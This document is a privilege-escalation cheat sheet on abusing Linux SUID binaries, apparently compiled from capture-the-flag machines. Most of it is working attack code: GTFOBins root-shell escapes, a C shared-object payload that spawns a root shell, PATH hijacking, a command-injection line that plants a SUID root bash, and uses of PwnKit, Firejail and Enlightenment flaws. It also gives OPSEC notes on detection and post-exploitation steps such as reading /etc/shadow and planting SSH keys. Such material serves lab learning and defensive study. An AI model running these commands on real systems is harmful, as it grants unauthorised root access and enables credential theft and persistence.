SUID Abuse
#Overview
SUID (Set owner User ID) is a Unix permission flag that allows a binary to execute with the privileges of the file owner (typically root) rather than the user who runs it. When a SUID binary can be exploited -- whether through command injection, shared object hijacking, PATH manipulation, or a known vulnerability -- it becomes a direct path to root. GTFOBins catalogs dozens of exploitable SUID binaries.
#Prerequisites
- User-level shell access
- Standard tools:
find,ls,strings,strace,ltrace - GTFOBins knowledge: https://gtfobins.github.io/
#Detection & Enumeration
# Find all SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Find all SUID binaries (verbose, with permissions)
find / -perm -4000 -exec ls -la {} \; 2>/dev/null
# Find SUID binaries not in standard directories (non-standard ones first!)
find / -perm -4000 -type f 2>/dev/null | grep -vE '/bin/|/sbin/|/usr/bin/|/usr/sbin/|/usr/lib/'
# Find SGID binaries too
find / -perm -2000 -type f 2>/dev/null
# Check binary details
ls -la /path/to/binary
file /path/to/binary # Static vs dynamic
strings /path/to/binary # Look for command calls, paths
strace /path/to/binary 2>&1 | grep -i "open\|exec" # Trace system calls
ltrace /path/to/binary 2>&1 # Trace library calls
Real example from Cerberus: /usr/bin/firejail was found as a non-standard SUID binary:
find / -perm -u=s -type f 2>/dev/null
firejail --version # 0.9.68rc1 -- vulnerable to CVE-2022-31214
#Exploitation / Execution
#GTFOBins Reference
Always cross-reference found SUID binaries with GTFOBins. Common exploitable SUID binaries and their escalation commands:
# pkexec (CVE-2021-4034 PwnKit) -- if version vulnerable
pkexec /bin/bash # Post-exploit usage
# find
find . -exec /bin/sh -p \; -quit
# bash (if bash has SUID with -p flag)
bash -p
# vim
vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
# less / more
less /etc/passwd
# Inside less: !/bin/sh
# cp / mv (overwrite /etc/passwd or /etc/sudoers)
# Overwrite /etc/passwd with a root user entry
# awk
awk 'BEGIN {system("/bin/sh")}'
# python/perl/ruby
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# tar
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
#Non-Standard SUID Binaries (Higher Priority)
Binaries not in standard system paths are more likely to have exploitable behaviors. Check these first:
# Look for SUID binaries in custom paths
find /opt /home /tmp /var /srv /usr/local -perm -4000 -type f 2>/dev/null
# Example: /opt/scanner/scanner (from Intentions)
# Had CAP_DAC_READ_SEARCH capability, bypassing file permissions
#Shared Object Injection into SUID Binaries
When a SUID binary loads a custom shared object:
# Run the binary under strace to find missing libraries
strace /usr/local/bin/vulnerable_binary 2>&1 | grep -i "open\|ENOENT"
# Create malicious shared object to match a missing library path
# gcc -shared -fPIC -o /tmp/libmissing.so /tmp/exploit.c
# /tmp/exploit.c:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
setuid(0);
setgid(0);
system("/bin/bash -p");
}
# Run the binary so it loads our shared object
LD_LIBRARY_PATH=/tmp /usr/local/bin/vulnerable_binary
#PATH Manipulation for SUID Binaries
When a SUID binary calls another command without an absolute path:
# Check for relative command calls
strings /usr/local/bin/suid_binary | grep -E "^[a-zA-Z]"
# If it calls 'ls' or 'cat' without full path:
echo '/bin/bash -p' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
/usr/local/bin/suid_binary # Executes our fake 'ls' as root
#Bash -p Flag for SUID Shell
The -p flag prevents bash from dropping privileges when running as SUID:
bash -p
# Now running with effective UID 0 (root)
id # uid=1000(user) gid=1000(user) euid=0(root)
#Custom SUID Binary Exploitation Examples
Firejail (CVE-2022-31214) -- Container breakout from Cerberus:
# Identify version
firejail --version # 0.9.68rc1 - vulnerable
# Exploit: symlink attack on /run/firejail/mnt/join
./firejoin.py # Create fake firejail process
firejail --join=<PID> # Join the fake process, get root
Enlightenment (CVE-2022-37706) -- SUID on enlightenment_sys:
# If /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys is SUID
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/sh -p
Xorg.wrap -- If SUID and can specify arbitrary config:
# Create malicious Xorg config, execute Xorg.wrap
#Command Injection in SUID Binaries
Some custom SUID binaries accept user input that gets passed to system():
# Test with:
/usr/local/bin/suid_tool "test; id"
# If it shows root UID, command injection confirmed
# Exploit:
/usr/local/bin/suid_tool "test; cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash"
/tmp/rootbash -p
#strace/ltrace Analysis
# strace: trace all system calls
strace -f /usr/local/bin/suid_binary 2>&1 | grep -E "execve|open|access"
# ltrace: trace library calls (can reveal function usage)
ltrace /usr/local/bin/suid_binary 2>&1
# Both help identify: file opens, command executions, missing libraries
#doas — Alternative to sudo
doas is common on OpenBSD, Alpine, and some Linux distros:
# Check for doas configuration
cat /etc/doas.conf
cat /usr/local/etc/doas.conf
# Common misconfigurations:
# permit nopass :wheel # Any user in wheel group can run any command
# permit nopass user cmd # Specific user can run specific command
# Exploitation same as sudo: if doas permits a command, check GTFOBins for that binary
#Capabilities on SUID Binaries
Always check capabilities alongside SUID — a binary can have both:
find / -perm -4000 -exec getcap {} \; 2>/dev/null
# Example: Binary is SUID AND has cap_setuid+ep → multiple exploitation paths
#Common Pitfalls
- Assuming all SUID binaries are in /bin, /sbin, /usr/bin -- custom applications in /opt, /usr/local may have SUID
- Not checking the binary version against CVE databases before attempting generic exploitation
- Forgetting
bash -pflag -- without it, bash drops SUID privileges - strace/ltrace: The SUID binary may refuse to run under debuggers (ptrace restrictions)
- Assuming a GTFOBins entry always works -- distribution patches may change binary behavior
- Overlooking shared object dependencies -- run
ldd /path/to/binaryto list them
#OPSEC Considerations
find / -perm -4000is a standard admin command -- low noise.- strace/ltrace on SUID binaries generates unusual audit events.
- Exploiting SUID binaries typically creates child processes visible in
ps aux. - Some SUID exploits (especially kernel-related) may cause system crashes or kernel panics.
- Successful exploitation may be logged by auditd or systemd-journald.
#Post-Exploitation Value
SUID exploitation provides immediate root access. The root shell can be used to: read /root/root.txt, access /etc/shadow and crack passwords, install SSH key persistence, dump process memory of privileged services, pivot through the network with full privileges.
#Cross-References
#Tool References
| Tool | Link |
|---|---|
| GTFOBins | https://gtfobins.github.io/ |
| strace | Built-in: apt install strace |
| ltrace | Built-in: apt install ltrace |
#Source Machines
- Cerberus (Hard, Linux) - Firejail SUID binary CVE-2022-31214 used for container breakout to root
- Soccer (Easy, Linux) - doas SUID binary exploited via dstat plugin (custom Python code execution as root)
- Sau (Easy, Linux) - sudo on systemctl with pager escape (!/bin/bash)